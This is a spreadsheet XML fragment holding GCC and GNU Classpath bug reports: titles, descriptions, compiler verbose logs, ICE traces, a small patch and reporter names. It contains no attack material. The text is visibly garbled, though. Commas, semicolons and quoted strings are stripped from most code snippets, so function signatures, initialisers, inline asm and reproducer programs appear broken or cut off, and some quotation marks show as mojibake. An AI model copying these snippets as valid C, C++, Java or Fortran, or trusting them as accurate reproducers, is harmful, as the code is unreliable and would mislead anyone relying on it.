 /opt/local/include/gcc46/c++//x86_64-apple-darwin10
 /opt/local/include/gcc46/c++//backward
 /opt/local/lib/gcc46/gcc/x86_64-apple-darwin10/4.6.0/include
 /opt/local/include
 /opt/local/lib/gcc46/gcc/x86_64-apple-darwin10/4.6.0/include-fixed
 /usr/include
 /System/Library/Frameworks
 /Library/Frameworks
End of search list.
COLLECT_GCC_OPTIONS='-mmacosx-version-min=10.6.5' '-std=c++0x' '-v' '-g3' '-save-temps' '-Wall' '-o' 'expose_bug' '-shared-libgcc' '-mtune=generic'
 /opt/local/libexec/gcc/x86_64-apple-darwin10/4.6.0/cc1plus -fpreprocessed expose_bug.ii -fPIC -quiet -dumpbase expose_bug.cpp -mmacosx-version-min=10.6.5 -mtune=generic -auxbase expose_bug -g3 -Wall -std=c++0x -version -o expose_bug.s
GNU C++ (GCC) version 4.6.0 20101113 (experimental) (x86_64-apple-darwin10)
	compiled by GNU C version 4.6.0 20101113 (experimental) GMP version 5.0.1 MPFR version 3.0.0-p8 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
GNU C++ (GCC) version 4.6.0 20101113 (experimental) (x86_64-apple-darwin10)
	compiled by GNU C version 4.6.0 20101113 (experimental) GMP version 5.0.1 MPFR version 3.0.0-p8 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 4b970d796b9f2164104727f632078674
COLLECT_GCC_OPTIONS='-mmacosx-version-min=10.6.5' '-std=c++0x' '-v' '-g3' '-save-temps' '-Wall' '-o' 'expose_bug' '-shared-libgcc' '-mtune=generic'
 as -arch x86_64 -force_cpusubtype_ALL -o expose_bug.o expose_bug.s
COMPILER_PATH=/opt/local/libexec/gcc/x86_64-apple-darwin10/4.6.0/:/opt/local/libexec/gcc/x86_64-apple-darwin10/4.6.0/:/opt/local/libexec/gcc/x86_64-apple-darwin10/:/opt/local/lib/gcc46/gcc/x86_64-apple-darwin10/4.6.0/:/opt/local/lib/gcc46/gcc/x86_64-apple-darwin10/
LIBRARY_PATH=/opt/local/lib/gcc46/gcc/x86_64-apple-darwin10/4.6.0/:/opt/local/lib/gcc46/gcc/x86_64-apple-darwin10/4.6.0/../../../:/usr/lib/
COLLECT_GCC_OPTIONS='-mmacosx-version-min=10.6.5' '-std=c++0x' '-v' '-g3' '-save-temps' '-Wall' '-o' 'expose_bug' '-shared-libgcc' '-mtune=generic'
 /opt/local/libexec/gcc/x86_64-apple-darwin10/4.6.0/collect2 -dynamic -arch x86_64 -macosx_version_min 10.6.5 -weak_reference_mismatches non-weak -o expose_bug -lcrt1.10.5.o -L/opt/local/lib/gcc46/gcc/x86_64-apple-darwin10/4.6.0 -L/opt/local/lib/gcc46/gcc/x86_64-apple-darwin10/4.6.0/../../.. expose_bug.o -lstdc++ -lgcc_ext.10.5 -lgcc -no_compact_unwind -lSystem
COLLECT_GCC_OPTIONS='-mmacosx-version-min=10.6.5' '-std=c++0x' '-v' '-g3' '-save-temps' '-Wall' '-o' 'expose_bug' '-shared-libgcc' '-mtune=generic'</t>
  </si>
  <si>
    <t>nate.knight</t>
  </si>
  <si>
    <t>GCC-10985</t>
  </si>
  <si>
    <t>money_get should heed frac_digits</t>
  </si>
  <si>
    <t>GCC-48895</t>
  </si>
  <si>
    <t>config/vms/vms-ar.c:main: variable â€˜cwdâ€™ set but not used</t>
  </si>
  <si>
    <t>gcc -c   -g -O2 -DIN_GCC -DCROSS_DIRECTORY_STRUCTURE  -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -Wold-style-definition -Wc++-compat -fno-common  -DHAVE_CONFIG_H -I. -I. -I../../../gcc/gcc -I../../../gcc/gcc/. -I../../../gcc/gcc/../include -I../../../gcc/gcc/../libcpp/include -I/opt/cfarm/mpc/include  -I../../../gcc/gcc/../libdecnumber -I../../../gcc/gcc/../libdecnumber/dpd -I../libdecnumber    -I. -I. -I../../../gcc/gcc -I../../../gcc/gcc/. -I../../../gcc/gcc/../include -I../../../gcc/gcc/../libcpp/include -I/opt/cfarm/mpc/include  -I../../../gcc/gcc/../libdecnumber -I../../../gcc/gcc/../libdecnumber/dpd -I../libdecnumber   ../../../gcc/gcc/config/vms/vms-ar.c -o vms-ar.o
../../../gcc/gcc/config/vms/vms-ar.c: In function â€˜mainâ€™:
../../../gcc/gcc/config/vms/vms-ar.c:128:9: error: variable â€˜cwdâ€™ set but not used [-Werror=unused-but-set-variable]
cc1: all warnings being treated as errors</t>
  </si>
  <si>
    <t>GCC-36212</t>
  </si>
  <si>
    <t>Vector alignment overides Target alignment</t>
  </si>
  <si>
    <t>For avr we have multiple failures of testcases due to alignment warnings such as:
gcc/gcc/testsuite/gcc.dg/debug/const-1.c:3: warning: alignment of 'Foo' is       greater than maximum object file alignment.  Using 1
Which in this example occurs due to:
    typedef float FloatVect __attribute__((__vector_size__(16)))
    FloatVect Foo = { 250000000.0 0.0 0.0 0.0 }
While trying to fix this I have discovered several issues which make the correct fix somewhat unclear and perhaps indicating more than one bug.
The warning occurs because alignment of the vector is 16 bytes regardless of all target alignment controls. In particular:
#define BIGGEST_ALIGNMENT 8
By default this also determines MAX_OFILE_ALIGNMENT which is used by the alignment check in varasm.c (if (16&gt;1) Warning)
Problem 1) varasm.c - is the only place MAX_OFILE_ALIGNMENT is used. Here it immediately tries to increase or decrease alignment AFTER it does check - which suggests the check is misplaced or not useful in the first place.
To get around the test failure target MAX_OFILE_ALIGNMENT can be increased. (and logically should be to permit user defined alignments)
Problem 2) Without hard limit imposed by MAX_OFILE_ALIGNMENT vectors are aligned at 16 bytes - which break the supposed limit of BIGGEST_ALIGNMENT (1 byte).
Vector size is set in stor-layout.c :
	/* Always naturally align vectors.  This prevents ABI changes
	   depending on whether or not native vector modes are supported.  */
	TYPE_ALIGN (type) = tree_low_cst (TYPE_SIZE (type) 0)
        break
There is no way for target to override this alignment. It does not seem correct to assume a specific vector alignment independent of target. Perhaps there should be:
#ifdef  TARGET_VECTOR_ALIGN (..)
...
...
#else
Some may say that vectors are relevant only targets that support hardware vector operations and thus alignment choice is currently moot. But..
Problem 3) gcc provide no hooks for  the target or testsuite to elegantly disable vector extensions (that I can find anyway).</t>
  </si>
  <si>
    <t>GCC-55707</t>
  </si>
  <si>
    <t>[4.7 Regression] bootstrap fails in gcc/graphite-dependences.c error cast loses precision</t>
  </si>
  <si>
    <t>Issue on LLP64 systems. Simple proposed patch:
Index: graphite-dependences.c
===================================================================
--- graphite-dependences.c      (Revision 194496)
+++ graphite-dependences.c      (Arbeitskopie)
@@ -567 +567 @@ hash_poly_ddr_p (const void *pddr)
 {
   const struct poly_ddr *p = (const struct poly_ddr *) pddr
-  return (hashval_t) ((long) PDDR_SOURCE (p) + (long) PDDR_SINK (p))
+  return (hashval_t) ((intptr_t) PDDR_SOURCE (p) + (intptr_t) PDDR_SINK (p))
 }
 /* Returns true when PDDR has no dependence.  */</t>
  </si>
  <si>
    <t>GCC-22310</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE in in first_vi_for_offset</t>
  </si>
  <si>
    <t>% g++ -v -O -c min4.cc 
Using built-in specs.
Target: alphaev68-unknown-linux-gnu
Configured with: ../configure --disable-nls --enable-languages=c++
Thread model: posix
gcc version 4.1.0 20050705 (experimental)
 /usr/local/stow/gcc-2005.07.05/bin/../libexec/gcc/alphaev68-unknown-linux-gnu/4.1.0/cc1plus
-quiet -v -iprefix
/usr/local/stow/gcc-2005.07.05/bin/../lib/gcc/alphaev68-unknown-linux-gnu/4.1.0/
min4.cc -quiet -dumpbase min4.cc -mcpu=ev67 -auxbase min4 -O -version -o
/tmp/cc8V3FBD.s
ignoring nonexistent directory
/usr/local/stow/gcc-2005.07.05/bin/../lib/gcc/alphaev68-unknown-linux-gnu/4.1.0/../../../../alphaev68-unknown-linux-gnu/include
ignoring duplicate directory
/usr/local/lib/gcc/alphaev68-unknown-linux-gnu/4.1.0/../../../../include/c++/4.1.0
ignoring duplicate directory
/usr/local/lib/gcc/alphaev68-unknown-linux-gnu/4.1.0/../../../../include/c++/4.1.0/alphaev68-unknown-linux-gnu
ignoring duplicate directory
/usr/local/lib/gcc/alphaev68-unknown-linux-gnu/4.1.0/../../../../include/c++/4.1.0/backward
ignoring nonexistent directory NONE/include
ignoring duplicate directory
/usr/local/lib/gcc/alphaev68-unknown-linux-gnu/4.1.0/include
ignoring nonexistent directory
/usr/local/lib/gcc/alphaev68-unknown-linux-gnu/4.1.0/../../../../alphaev68-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/stow/gcc-2005.07.05/bin/../lib/gcc/alphaev68-unknown-linux-gnu/4.1.0/../../../../include/c++/4.1.0
 /usr/local/stow/gcc-2005.07.05/bin/../lib/gcc/alphaev68-unknown-linux-gnu/4.1.0/../../../../include/c++/4.1.0/alphaev68-unknown-linux-gnu
 /usr/local/stow/gcc-2005.07.05/bin/../lib/gcc/alphaev68-unknown-linux-gnu/4.1.0/../../../../include/c++/4.1.0/backward
 /usr/local/stow/gcc-2005.07.05/bin/../lib/gcc/alphaev68-unknown-linux-gnu/4.1.0/include
 /usr/local/include
 /usr/include
End of search list.
GNU C++ version 4.1.0 20050705 (experimental) (alphaev68-unknown-linux-gnu)
        compiled by GNU C version 4.1.0 20050705 (experimental).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 48193d44e71dca2238e35a9b055060fc
min4.cc: In member function 'const ai::defensive_position&amp;
ai::best_defensive_position(const gamemap::location&amp; const
std::multimap&lt;gamemap::location gamemap::location
std::less std::allocator&lt;std::pair&lt;const gamemap::location
gamemap::location&gt; &gt; &gt;&amp; const std::multimap&lt;gamemap::location
gamemap::location std::less std::allocator&lt;std::pair&lt;const
gamemap::location gamemap::location&gt; &gt; &gt;&amp; const
std::multimap&lt;gamemap::location gamemap::location
std::less std::allocator&lt;std::pair&lt;const gamemap::location
gamemap::location&gt; &gt; &gt;&amp; const std::multimap&lt;gamemap::location
gamemap::location std::less std::allocator&lt;std::pair&lt;const
gamemap::location gamemap::location&gt; &gt; &gt;&amp;) const':
min4.cc:74: internal compiler error: in first_vi_for_offset at
tree-ssa-structalias.c:2565
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
I cannot reproduce this on i686-pc-linux-gnu for some reason... last changelog
entry is
2005-07-05  Kazu Hirata  
        * Makefile.in (stamp-as): Use $(ORIGINAL_AS_FOR_TARGET)
        instead of $&lt;.  Don't remove ./as if it already exists.
so Daniel Berlin's fix for PR 22279 is already in.</t>
  </si>
  <si>
    <t>GCC-9694</t>
  </si>
  <si>
    <t>Re: Fix latent bug in crossjumping</t>
  </si>
  <si>
    <t xml:space="preserve"> On Thu Feb 13 2003 at 02:09:34PM +0100 Josef Zlomek wrote:
 &gt; 	* cfgcleanup.c (outgoing_edges_match): When there is single outgoing
 &gt;	edge and block ends with a jump insn it must be simple jump.
 Ok.
 r~
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-78631</t>
  </si>
  <si>
    <t>[Intel MPX] libmpxwrappers shared library leads to a non-bounds-preserving memcpy()</t>
  </si>
  <si>
    <t>The libc-wrappers library for Intel MPX libmpxwrappers has incorrect implementations of memcpy and mempcpy functions.
When any program calls memcpy() the compiler pass substitutes it to __mpx_wrapper_memcpy() so the call is redirected into libmpxwrappers. Unfortunately __mpx_wrapper_memcpy() has a buggy implementation which leads to the loss of bounds information and can miss real out-of-bounds violations.
(The following was tested on gcc 6.1.0 but the code for 6.2.0 and in the master branch seems to be the same thus I believe this bug persists in newer versions as well. The affected code is in libmpx/mpxwrap/mpx_wrappers.c)
So this is the implementation of __mpx_wrapper_memcpy():
void * __mpx_wrapper_memcpy (void *dst const void *src size_t n) {
  return __mpx_wrapper_memmove (dst src n)
}
__mpx_wrapper_memmove() is:
void *__mpx_wrapper_memmove (void *dst const void *src size_t n) {
  ...
  __bnd_chk_ptr_bounds (dst n)
  __bnd_chk_ptr_bounds (src n)
  ... call real memmove() ...
}
Now when it is compiled into a shared libmpxwrappers.so library the following asm results:
:
 1f50:  sub    $0x8%rsp
 1f54:  bnd callq ad0 
 1f5a:  add    $0x8%rsp
 1f5e:  bnd retq
:
 ad0:   jmpq   *0x201c5a(%rip) # 202730 
 ad6:   pushq  $0x0
 adb:   jmpq   ac0 
:
 ... actually performs bounds checking ...
Pay attention to the jmpq instruction (at line ad0) which indirectly calls __mpx_wrapper_memmove() through PLT/GOT. Since this instruction has no BND prefix all BND0-3 registers will be INITed. (This of course depends on the BNDPRESERVE bit since BNDPRESERVE is 0 by default this is the behavior we observed.)
In a nutshell: the PLT/GOT resolving mechanism puts a plain jmp instruction instead of a bnd jmp version --&gt; this INITs registers BND0-3 in __mpx_wrapper_memmove() which actually performs bounds checking --&gt; a real out-of-bounds bug in the program is missed.
Simple workaround would be to copy-paste bounds-checking code (__bnd_chk_ptr_bounds ...) inside __mpx_wrapper_memcpy(). Then the checks will definitely happen before any registers are nullified.
A workaround that I used was to set BNDPRESERVE=1 (then my program bug was correctly detected). But this worked only for my tiny program which had no other legacy libraries.
A real solution would require re-building libmpxwrappers with a correct PLT/GOT resolution which uses BND-prefixed jumps.</t>
  </si>
  <si>
    <t>dmitrii.kuvaiskii</t>
  </si>
  <si>
    <t>GCC-43070</t>
  </si>
  <si>
    <t>[4.5 Regression] g++.dg/ext/label2.C fails to compile at -O1</t>
  </si>
  <si>
    <t>Command line:
g++ -O1 label2.C
Tested revisions:
r156745 - crash
r155966 - crash
r153685 - crash
4.4 r156256 - OK
Output with checking:
$ /mnt/svn/gcc-trunk/binary-156745-lto/bin/g++ -O1 /mnt/svn/gcc-trunk/gcc/testsuite/g++.dg/ext/label2.C
/mnt/svn/gcc-trunk/gcc/testsuite/g++.dg/ext/label2.C: In function void f() [with T = int]:
/mnt/svn/gcc-trunk/gcc/testsuite/g++.dg/ext/label2.C:11:23: error: address taken but ADDRESSABLE bit not set
p
cc1plus: note: in statement
goto 
/mnt/svn/gcc-trunk/gcc/testsuite/g++.dg/ext/label2.C:11:23: internal compiler error: verify_stmts failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Output with release checking:
$ /mnt/svn/gcc-trunk/binary-155966-lto-checking-release/bin/g++ -O1 /mnt/svn/gcc-trunk/gcc/testsuite/g++.dg/ext/label2.C
/mnt/svn/gcc-trunk/gcc/testsuite/g++.dg/ext/label2.C: In function void f() [with T = int]:
/mnt/svn/gcc-trunk/gcc/testsuite/g++.dg/ext/label2.C:4:6: internal compiler error: in expand_expr_addr_expr_1 at expr.c:6895
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-42254</t>
  </si>
  <si>
    <t>[4.5 Regression] Massive regression in the g++ testsuite due to revision 154890</t>
  </si>
  <si>
    <t>From pr41988
Comment # 21:
The debug failures are gone now at -m32 for x86_64-apple-darwin10 but I am now
seeing a whole new slew of failures at r154891 in check-g++.
...
Comment #24:
&gt; This new breakage is universal. It is showing up on linux as well.
between revisions 154889  and 154891:
http://gcc.gnu.org/ml/gcc-testresults/2009-12/msg00100.html
http://gcc.gnu.org/ml/gcc-testresults/2009-12/msg00103.html
The only candidate is:
Revision 154890
Author:	tglek
Date:	Wed Dec 2 01:00:39 2009 UTC (13 hours 2 minutes ago)
Changed paths:	3
Log Message:	
* parser.c (cp_parser_class_specifier): Set class location to that of IDENTIFIER_NODE instead of '{' when possible.\n* semantics.c (begin_class_definition): Do not overide locations with less precise ones.
Changed paths:
Path	Details
trunk/gcc/cp/ChangeLog	modified  text changed
trunk/gcc/cp/parser.c	modified  text changed
trunk/gcc/cp/semantics.c	modified  text changed</t>
  </si>
  <si>
    <t>GCC-65689</t>
  </si>
  <si>
    <t>[5 Regression][AArch64] S constraint fails for inline asm at -O0</t>
  </si>
  <si>
    <t>Starting with r221532 (https://gcc.gnu.org/ml/gcc-patches/2015-03/msg01064.html)
void
test (void)
{
    __asm__ (@ %c0 : : S (
}
fails to compile at -O0 on all aarch64 targets with:
c-output-template-3.c: In function 'test':
c-output-template-3.c:7:5: error: impossible constraint in 'asm'
     __asm__ (@ %c0 : : S (
(This is gcc.target/aarch64/c-output-template-3.c without the -O added in r221905 as that leads to successful compilation - however the testcase should compile without -O too.)</t>
  </si>
  <si>
    <t>GCC-4499</t>
  </si>
  <si>
    <t>during make make install make bootstrap</t>
  </si>
  <si>
    <t>when i try to make gcc it tells me that the file gthr.h is not to be found.
Release:
gcc 3.01
Environment:
redhat linux 7.1 kernel: 2.4.10
How-To-Repeat:
make</t>
  </si>
  <si>
    <t>jkolb</t>
  </si>
  <si>
    <t>GCC-3256</t>
  </si>
  <si>
    <t>wrong code with throw / catch and optimization</t>
  </si>
  <si>
    <t>Program fails with gcc-3.0 and option '-O'
runs o.k. without optimization
runs o.k. with gcc-2.95.3 even with optimization '-O'
Release:
gcc-3.0
Environment:
sparc-sun-solaris2.8
How-To-Repeat:
g++ -O test_5.c &amp;&amp; ./a.out</t>
  </si>
  <si>
    <t>GCC-5008</t>
  </si>
  <si>
    <t>Error while compiling / eh_aux_runtime / as</t>
  </si>
  <si>
    <t>Compiling gcc results in the following error message!
Newer binutils with the following version do the same:
GNU assembler version 2.11.92 (i686-pc-linux-gnu) using BFD version 2.11.92 20011204
...
/tmp/ccCjtQyl.s: Assembler messages:
/tmp/ccCjtQyl.s:322: Warning: missing operand zero assumed
/tmp/ccCjtQyl.s:413: Warning: missing operand zero assumed
/tmp/ccCjtQyl.s:539: Warning: missing operand zero assumed
/tmp/ccCjtQyl.s:581: Warning: missing operand zero assumed
/tmp/ccCjtQyl.s:622: Warning: missing operand zero assumed
/tmp/ccCjtQyl.s:664: Warning: missing operand zero assumed
/tmp/ccCjtQyl.s:322: Error: undefined symbol `_ZNSt9exceptionD1Ev' in operation
/tmp/ccCjtQyl.s:322: Error: undefined symbol `INTERNAL' in operation
/tmp/ccCjtQyl.s:413: Error: undefined symbol `_ZNSt9exceptionD1Ev' in operation
/tmp/ccCjtQyl.s:413: Error: undefined symbol `INTERNAL' in operation
/tmp/ccCjtQyl.s:539: Error: undefined symbol `_ZNSt9exceptionD1Ev' in operation
/tmp/ccCjtQyl.s:539: Error: undefined symbol `INTERNAL' in operation
/tmp/ccCjtQyl.s:581: Error: undefined symbol `_ZNSt9exceptionD1Ev' in operation
/tmp/ccCjtQyl.s:581: Error: undefined symbol `INTERNAL' in operation
/tmp/ccCjtQyl.s:622: Error: undefined symbol `_ZNSt9exceptionD1Ev' in operation
/tmp/ccCjtQyl.s:622: Error: undefined symbol `INTERNAL' in operation
/tmp/ccCjtQyl.s:664: Error: undefined symbol `_ZNSt9exceptionD1Ev' in operation
/tmp/ccCjtQyl.s:664: Error: undefined symbol `INTERNAL' in operation
make[3]: *** [eh_aux_runtime.lo] Error 1
make[3]: Leaving directory `/windows/gcc/i686-pc-linux-gnu/libstdc++-v3/libsupc++'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/windows/gcc/i686-pc-linux-gnu/libstdc++-v3'
make[1]: *** [all-recursive-am] Error 2
make[1]: Leaving directory `/windows/gcc/i686-pc-linux-gnu/libstdc++-v3'
make: *** [all-target-libstdc++-v3] Error 2
Release:
latest cvs
Environment:
glibc-2.2.90</t>
  </si>
  <si>
    <t>GCC-83593</t>
  </si>
  <si>
    <t>[8 Regression] ICE: verify_gimple failed (error: statement marked for throw but doesn't)</t>
  </si>
  <si>
    <t>gcc-8.0.0-alpha20171224 snapshot (r255993) ICEs when compiling the following snippet w/ -O2 (-O3 -Ofast) -fno-tree-dominator-opts -fnon-call-exceptions -fno-tree-pre -fexceptions -fno-code-hoisting -fno-tree-fre:
void
hr (int *ed signed char *ju)
{
  int kc
    {
      int xj
      int *q2 = (*ed == 0) ? 
      *ju = 0
      kc = *ju
    }
}
% gcc-8.0.0-alpha20171224 -O2 -fno-tree-dominator-opts -fnon-call-exceptions -fno-tree-pre -fexceptions -fno-code-hoisting -fno-tree-fre -c czocw0lq.c
czocw0lq.c: In function 'hr':
czocw0lq.c:2:1: error: statement marked for throw but doesn't
 hr (int *ed signed char *ju)
 ^~
_7 = 0
during GIMPLE pass: strlen
czocw0lq.c:2:1: internal compiler error: verify_gimple failed
0xd8250f verify_gimple_in_cfg(function* bool)
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20171224/work/gcc-8-20171224/gcc/tree-cfg.c:5569
0xc7490f execute_function_todo
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20171224/work/gcc-8-20171224/gcc/passes.c:1994
0xc7536e execute_todo
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20171224/work/gcc-8-20171224/gcc/passes.c:2048</t>
  </si>
  <si>
    <t>GCC-43351</t>
  </si>
  <si>
    <t>ICE: SIGSEGV with -fgraphite-identity in 4.4</t>
  </si>
  <si>
    <t>This is very similiar to pr43083. In trunk it stopped crashing between r156745 and r156999 so it's probably fixed by r156997 fix for pr43083.
Command line:
gcc -O1 testcase.c
in 4.4 it crashes with -O[123s] but in trunk r156745 only with -O1
---- testcase.c ----
int foo(int i)
{
  if (i &lt; 0) return 0
  for ( i &lt; 10 i++)
}
--------------------
(it can be further reduced so it crashes in 4.4 but not in 4.5 r156745)
Tested revisions:
r157339 - OK
r156999 - OK
r156745 - crash
r153685 - crash
4.4 r157395 - crash
4.4 r153668 - crash
4.4 r149995 - crash
Compiler output:
$ /mnt/svn/gcc-4_4/binary-157395-enable-checking/bin/gcc -O1 -fgraphite-identity -c testcase.c
testcase.c: In function 'foo':
testcase.c:1: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-38390</t>
  </si>
  <si>
    <t>Missing DW_TAG_imported_module</t>
  </si>
  <si>
    <t>It works on Fedora gcc-c++-4.3.2-7.x86_64 but on 4.4-HEAD DIEs for DW_TAG_imported_module are just missing.
import.C
------------------------------------------------------------------------------
namespace A
  {
    int v
  }
int
f ()
{
  using namespace A
  return v
}
------------------------------------------------------------------------------
g++ -c -o import.o import.C -Wall -g
From gcc-c++-4.3.2-7.x86_64:
 : Abbrev Number: 2 (DW_TAG_subprogram)
       DW_AT_external    : 1        
       DW_AT_name        : f        
       DW_AT_decl_file   : 1        
       DW_AT_decl_line   : 7        
       DW_AT_MIPS_linkage_name: (indirect string offset: 0x37): _Z1fv      
       DW_AT_type        :    
       DW_AT_low_pc      : 0x0      
       DW_AT_high_pc     : 0xc      
       DW_AT_frame_base  : 0x0      (location list)
       DW_AT_sibling     :    
 : Abbrev Number: 3 (DW_TAG_imported_module)
       DW_AT_decl_file   : 1        
       DW_AT_decl_line   : 9        
       DW_AT_import      :    [Abbrev Number: 5 (DW_TAG_namespace)]
From
GNU C++ (GCC) version 4.4.0 20081202 (experimental) (x86_64-unknown-linux-gnu)
	compiled by GNU C version 4.4.0 20081202 (experimental) GMP version 4.2.2 MPFR version 2.3.2.
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
 : Abbrev Number: 2 (DW_TAG_subprogram)
       DW_AT_external    : 1        
       DW_AT_name        : f        
       DW_AT_decl_file   : 1        
       DW_AT_decl_line   : 7        
       DW_AT_MIPS_linkage_name: (indirect string offset: 0x2b): _Z1fv      
       DW_AT_type        :    
       DW_AT_low_pc      : 0x0      
       DW_AT_high_pc     : 0xc      
       DW_AT_frame_base  : 0x0      (location list)
(other DIEs exactly the same DW_TAG_imported_module is missing here)</t>
  </si>
  <si>
    <t>GCC-15413</t>
  </si>
  <si>
    <t>List directed output does not print leading blank</t>
  </si>
  <si>
    <t>Unlike what one would expect PRINT* HELLO  should print
SIX characters:  SPACE H E L L O
Currently the leading blank is not printed which causes
miscompare on lucas benchmark.
I could not find this in the Standard but other compilers
do so and SPEC2000 benchmarks rely on this behavior for matching
the expected results.  I also checked this behavior with IBM XLF 
compiler -- same behavior.</t>
  </si>
  <si>
    <t>CLASSPATH-22646</t>
  </si>
  <si>
    <t>String.trim off by one on lead whitespace</t>
  </si>
  <si>
    <t>Running with classpath 0.04 under ORP.
The following prints lassname instead of classname
class x {
    static public void main( String[] args )
    {
        String s =  classname
        System.out.println( s.trim() )
    }
}</t>
  </si>
  <si>
    <t>GCC-33493</t>
  </si>
  <si>
    <t>[4.1 regression] Broken diagnostic: 'dl_expr' not supported by dump_expr</t>
  </si>
  <si>
    <t>The C++ frontend generates a broken diagnostic for the following code
snippet since GCC 3.4.0:
==============================================
template void foo() { delete 0 ? 1 : 0 }
==============================================
bug.cc: In function 'void foo()':
bug.cc:1: error: could not convert '#'dl_expr' not supported by dump_expr#' to 'bool'</t>
  </si>
  <si>
    <t>GCC-6162</t>
  </si>
  <si>
    <t>[3.3 regression] i386 asm reloader ice in reload_cse_simplify_operands</t>
  </si>
  <si>
    <t>On i386 a certain slightly convoluted combination of variables and
asm blocks provokes an ICE from gcc under -O -fomit-frame-pointer.
Release:
3.0.4 (Debian testing/unstable)
Environment:
System: Linux blah 2.2.15 #1 Tue Apr 25 17:13:48 EST 2000 i586 unknown
Architecture: i586
host: i386-pc-linux-gnu
build: i386-pc-linux-gnu
target: i386-pc-linux-gnu
configured with: ../src/configure -v --enable-languages=cc++javaf77protoobjc --prefix=/usr --infodir=/share/info --mandir=/share/man --enable-shared --with-gnu-as --with-gnu-ld --with-system-zlib --enable-long-long --enable-nls --without-included-gettext --disable-checking --enable-threads=posix --enable-java-gc=boehm --with-cpp-install-dir=bin --enable-objc-gc i386-linux
How-To-Repeat:
The file foo.c below (which has been through the preprocessor
already) compiled with
 gcc-3.0 -O -fomit-frame-pointer -c foo.c
produces
foo.c: In function `__gmpn_divrem_1':
foo.c:219: Unrecognizable insn:
(insn 399 662 401 (parallel[ 
            (set (reg/v:SI 6 ebp [89])
                (asm_operands:SI (addl %5%1
 adcl %3%0) (=r) 0[ 
                        (mem:SI (plus:SI (reg/f:SI 7 esp)
                                (const_int 48 [0x30])) 0)
                        (reg/v:SI 6 ebp [93])
                        (reg/v:SI 2 ecx [90])
                        (reg/v:SI 4 esi [78])
                    ] 
                    [ 
                        (asm_input:SI (%0))
                        (asm_input:SI (g))
                        (asm_input:SI (%1))
                        (asm_input:SI (g))
                    ]  (foo.c) 172))
            (set (reg/v:SI 2 ecx [90])
                (asm_operands:SI (addl %5%1
 adcl %3%0) (=&amp;r) 1[ 
                        (mem:SI (plus:SI (reg/f:SI 7 esp)
                                (const_int 48 [0x30])) 0)
                        (reg/v:SI 6 ebp [93])
                        (reg/v:SI 2 ecx [90])
                        (reg/v:SI 4 esi [78])
                    ] 
                    [ 
                        (asm_input:SI (%0))
                        (asm_input:SI (g))
                        (asm_input:SI (%1))
                        (asm_input:SI (g))
                    ]  (foo.c) 172))
            (clobber (reg:QI 19 dirflag))
            (clobber (reg:QI 18 fpsr))
            (clobber (reg:QI 17 flags))
        ] ) -1 (insn_list 390 (insn_list 390 (nil)))
    (nil))
foo.c:219: Internal compiler error in reload_cse_simplify_operands at reload1.c:8364
For what it's worth this was an experimental GMP division routine
but only a work-in-progress version so the code isn't supposed to
work or do anything useful but I think it's syntactically correct
(since it seems to compile fine if either of -O or
-fomit-frame-pointer is omitted).</t>
  </si>
  <si>
    <t>GCC-63858</t>
  </si>
  <si>
    <t>fixed form OpenACC directive ICE with -fopenacc -fopenmp</t>
  </si>
  <si>
    <t>The attached test case causes gfortran to ICE when -fopenmp is used with -fopenacc. It looks like there is a problem with the way that continuations are handled in openmp/openacc directives.</t>
  </si>
  <si>
    <t>GCC-68877</t>
  </si>
  <si>
    <t>[6 Regression] swap for multidimensional array of int ill-formed</t>
  </si>
  <si>
    <t>The following code example (A reduced form of an example from a recent LWG issue http://cplusplus.github.io/LWG/lwg-active.html#2554)
/-----------------------------------------------
#include 
int main() 
{
  int x[2][3]
  int y[2][3]
  std::swap(x y)
}
/-----------------------------------------------
compiled with the flags
-Wall -Wextra
and targetting any of C++1z C++14 or C++11 with or without GNU extensions is rejected in 
gcc HEAD 6.0.0 20151207 (experimental)
(but not in previous releases such as 5.2.0) with the compiler diagnostics:
In file included from /usr/local/gcc-head/include/c++/6.0.0/bits/move.h:57:0
                 from /usr/local/gcc-head/include/c++/6.0.0/bits/stl_pair.h:59
                 from /usr/local/gcc-head/include/c++/6.0.0/utility:70
                 from prog.cc:1:
/usr/local/gcc-head/include/c++/6.0.0/type_traits: In instantiation of 'typename std::enable_if::value&gt;::type std::swap(_Tp ( long unsigned int _Nm = 1ul typename std::enable_if::value&gt;::type = void]':
prog.cc:8:17:   required from here
/usr/local/gcc-head/include/c++/6.0.0/type_traits:2594:27: error: no matching function for call to 'swap(int [2] int [2])'
     noexcept(noexcept(swap(*__a *__b)))
                       ~~~~^~~~~~~~~~~~
In file included from /usr/local/gcc-head/include/c++/6.0.0/bits/stl_pair.h:59:0
                 from /usr/local/gcc-head/include/c++/6.0.0/utility:70
                 from prog.cc:1:
/usr/local/gcc-head/include/c++/6.0.0/bits/move.h:179:5: note: candidate: template typename std::enable_if std::is_move_assignable &gt;::value&gt;::type std::swap(_Tp&amp; _Tp&amp;)
     swap(_Tp&amp; __a _Tp&amp; __b)
     ^~~~
/usr/local/gcc-head/include/c++/6.0.0/bits/move.h:179:5: note:   template argument deduction/substitution failed:
/usr/local/gcc-head/include/c++/6.0.0/bits/move.h: In substitution of 'template typename std::enable_if std::is_move_assignable &gt;::value&gt;::type std::swap(_Tp&amp; _Tp&amp;) [with _Tp = int [2]]':
